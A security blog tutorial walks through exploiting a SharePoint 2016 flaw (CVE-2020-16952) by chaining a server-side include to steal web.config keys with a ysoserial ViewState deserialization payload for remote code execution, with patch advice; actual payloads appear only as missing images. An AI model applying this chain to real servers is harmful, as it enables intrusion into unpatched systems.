How to Exploit Microsoft SharePoint for SSI and ViewState Deserialization
From this post, how will learn how to exploit a server-side inclusion vulnerability and chain the same with ViewState deserialization for remote code execution in Microsoft SharePoint. Make sure you read the complete post for a good understanding of vulnerability and exploitation.
Introduction:
SharePoint is one of the most popular web-based collaboration and content management platform from Microsoft. Recently security teachers have found remote code execution vulnerabilities in 3 of the Microsoft SharePoint product. To exploit it an attacker has to first exploit SSI and followed by ViewState Deserialization.
The affected products are listed below:
Exploitation:
For demonstration purposes, I have already installed the Windows server 2016 evaluation version on virtual box VM and also completed the setup for the Microsoft SharePoint Enterprise server 2016.
To exploit this vulnerability, we need to have valid credentials to log in to the application. Also, the account should have page creation privilege, which is standard permission in SharePoint.
We will use a PUT HTTP method to upload some random data on a new page. The command is in the below image.
And access the new page view browser to confirm we have file upload privilege.
Next, by using BurpSuite we will create a file called ssi.aspx with a payload as shown in the below image to exploit SSI vulnerability.
And now, we retired web.config file. From this file, we have to note down validationKey and validation algorithm value which we will use for generation ViewState payload.
Moving to the second step of the exploit, that is ViewState deserialization vulnerability. We now are going to create a ViewState serialized payload using yososerial which would open notepad on the target server.
After getting the payload, we will use this in an endpoint where ViewState is passed and send the request.
And when we check back to the VM, we will observer that the notepad is opened and this confirms the execution of your payload.
Similarly, using ysoserial, we can gain a reverse shell on the server as well.
Remediation:
Microsoft has released the security update addressing the vulnerability by correcting how Sharepoint checks the source markup of application packages. I strongly recommend anyone who is using these products to apply the patch as soon as possible.
Disclaimer:
Neither I have found this critical vulnerability nor taking any credits for the CVE (CVE-2020–16952). I have only created the video after analyzing the description available on various blogs and public forums to help security enthusiasts educate about this issue. I am not responsible for any damage caused to an organization using this exploit & I would advise the users not to exploit this vulnerability without written consent from the organization as it may expose the organization open to attacks by other hackers.
